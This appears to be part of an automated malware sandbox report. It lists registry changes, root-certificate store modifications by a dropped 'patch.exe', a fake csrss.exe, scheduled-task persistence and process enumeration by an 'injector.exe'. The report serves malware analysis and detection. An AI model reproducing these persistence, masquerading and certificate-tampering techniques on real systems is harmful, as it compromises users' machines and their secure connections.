Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 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 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-TNOCT.tmp\Wed10b607271059cb7.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-TNOCT.tmp\Wed10b607271059cb7.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\Build.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
